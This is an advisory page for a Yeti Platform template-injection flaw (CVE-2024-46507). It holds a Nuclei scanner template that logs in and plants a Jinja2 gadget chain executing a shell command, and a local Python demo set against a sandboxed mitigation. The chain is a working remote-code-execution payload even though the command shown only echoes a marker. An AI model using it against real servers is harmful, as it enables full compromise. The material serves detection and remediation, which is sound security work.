The Yeti Platform < 2.1.12 contains a Server-Side Template Injection (SSTI) vulnerability that can lead to Remote Code Execution (RCE) when exploited by an authenticated user. Attackers with valid credentials can inject malicious template expressions, which the server evaluates, allowing arbitrary command execution.
PoC code [public]
id: CVE-2024-46507

info:
  name: Yeti Platform < 2.1.12 - Server-Side Template Injection to RCE
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The Yeti Platform < 2.1.12 contains a Server-Side Template Injection (SSTI) vulnerability that can lead to Remote Code Execution (RCE) when exploited by an authenticated user. Attackers with valid credentials can inject malicious template expressions, which the server evaluates, allowing arbitrary command execution.
  impact: |
    Successful exploitation enables an attacker to execute arbitrary system commands, potentially leading to full server compromise.
  remediation: |
    Upgrade to Yeti Platform 2.1.12 or later to mitigate this vulnerability.
  reference:
    - https://rhinosecuritylabs.com/research/cve-2024-46507-yeti-server-side-template-injection-ssti/
  metadata:
    shodan-query: html:"Yeti</title>"
    verified: true
    max-request: 4
  tags: cve,cve2024,yeti,platform,ssti,rce,intrusive,vkev

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v2/auth/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryodI9qNm7xBZLCq9n

        ------WebKitFormBoundaryodI9qNm7xBZLCq9n
        Content-Disposition: form-data; name="username"

        {{username}}
        ------WebKitFormBoundaryodI9qNm7xBZLCq9n
        Content-Disposition: form-data; name="password"

        {{password}}
        ------WebKitFormBoundaryodI9qNm7xBZLCq9n--

    matchers:
      - type: word
        part: body
        words:
          - access_token
        internal: true

  - raw:
      - |
        POST /api/v2/templates/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"template":{"name":"AA","template":"value,tags\n{% for obj in data %}{{obj.value}},{{\";\".join(obj.tags.keys())}}\n{% endfor %}\n\n{% for x in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(\"echo Q1ZFLTIwMjQtNDY1MDcK | base64 -d\").read()}}{%endif%}{% endfor %}"}}

    skip-variables-check: true

    extractors:
      - type: json
        part: body
        name: template_id
        json:
          - '.id'
        internal: true

  - raw:
      - |
        POST /api/v2/observables/extended HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"observable":{"type":"ipv4","value":"1.{{randint(1,255)}}.{{randint(1,255)}}.{{randint(1,255)}}"}}

    extractors:
      - type: json
        part: body
        name: observable_id
        json:
          - '.id'
        internal: true

  - raw:
      - |
        POST /api/v2/templates/render HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"template_id":"{{template_id}}","observable_ids":["{{observable_id}}"],"search_query":""}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "CVE-2024-46507")'
          - 'contains(content_type, "text/plain")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a004830460221009f569bf0a9b0efd94803a83533e317c4b9ac63857ad432c24c70545d8011ccaa022100e93dfde04a6a3f980cd6739367525a799de3e4c25bfb7c88fb517d4acfec4e59:922c64590222798bb761d5b6d8e72950
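The template above chains four requests: authenticate, store an export template whose body carries a Jinja2 gadget chain, create an observable so the render has something to iterate over, then call /api/v2/templates/render and look for the decoded marker in the text/plain response. The Python below is an added example, not code from Yeti or from the template authors; it reproduces the underlying bug pattern locally so the gadget chain and its standard mitigation can be seen side by side. Rendering the same user-controlled template through a plain jinja2.Environment executes a shell command, while jinja2.sandbox.SandboxedEnvironment refuses the underscore attribute walk with SecurityError. The sample observables, the render_unsafe/render_sandboxed/probe names, and the plain `echo` in place of the PoC's base64 pipeline are assumptions made for this example; the class match is tightened to the exact name catch_warnings instead of the PoC's substring test. The page does not say how Yeti 2.1.12 fixes the issue; the sandboxed environment is shown here as the Jinja2-level mitigation, not as Yeti's patch.

```python
"""SSTI bug pattern behind CVE-2024-46507, reproduced locally.

Added example, not Yeti project code. Requires Jinja2, the engine Yeti renders
export templates with.
"""
import warnings  # the gadget reaches os through warnings.catch_warnings; imported so it is loaded

from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed sample data, shaped like the observables the PoC template loops over.
SAMPLE_DATA = [
    {"value": "1.2.3.4", "tags": {"c2": {}, "malware": {}}},
    {"value": "5.6.7.8", "tags": {"scanner": {}}},
]

# Legitimate CSV export template: the kind of content the endpoint is meant to accept.
BENIGN_TEMPLATE = (
    "value,tags\n"
    "{% for obj in data %}{{ obj.value }},{{ ';'.join(obj.tags.keys()) }}\n{% endfor %}"
)

# The PoC's gadget chain: from an empty tuple climb to `object`, enumerate its
# subclasses, instantiate warnings.catch_warnings (its instances keep the warnings
# module in `_module`), and pull __import__ out of that module's builtins.
# `echo` stands in for the PoC's base64 pipe (assumption); the marker is the same.
PAYLOAD = (
    "{% for x in ().__class__.__base__.__subclasses__() %}"
    "{% if x.__name__ == 'catch_warnings' %}"
    "{{ x()._module.__builtins__['__import__']('os')"
    ".popen('echo CVE-2024-46507').read() }}"
    "{% endif %}{% endfor %}"
)


def render_unsafe(template_src: str, data: list) -> str:
    """Vulnerable pattern: a user-supplied template compiled by a default Environment.

    Nothing stops the template from walking dunder attributes, so PAYLOAD runs a command.
    """
    return Environment().from_string(template_src).render(data=data)


def render_sandboxed(template_src: str, data: list) -> str:
    """Hardened pattern: SandboxedEnvironment treats every attribute whose name
    starts with '_' as unsafe. `().__class__` becomes an undefined value, and the
    next step of the chain raises SecurityError before anything is called.
    """
    return SandboxedEnvironment().from_string(template_src).render(data=data)


def probe(template_src: str, data: list) -> tuple:
    """Render in the sandbox and report (output, blocked)."""
    try:
        return render_sandboxed(template_src, data), False
    except SecurityError:
        return None, True


if __name__ == "__main__":
    print(render_unsafe(BENIGN_TEMPLATE, SAMPLE_DATA))
    print("unsafe renderer ran the payload:", repr(render_unsafe(PAYLOAD, SAMPLE_DATA)))
    print("sandbox still renders the benign template:", probe(BENIGN_TEMPLATE, SAMPLE_DATA)[1] is False)
    print("sandbox blocked the payload:", probe(PAYLOAD, SAMPLE_DATA)[1])
```

The benign export renders identically under both environments, which is the property a fix has to preserve: the sandbox does not break the feature, it only removes the reflective path from `__class__` to `__import__`. Anything that still compiles attacker-supplied template text, even inside the sandbox, should also be treated as code execution surface in a threat model, since sandbox escapes have been found before; restricting who may create templates is the complementary control.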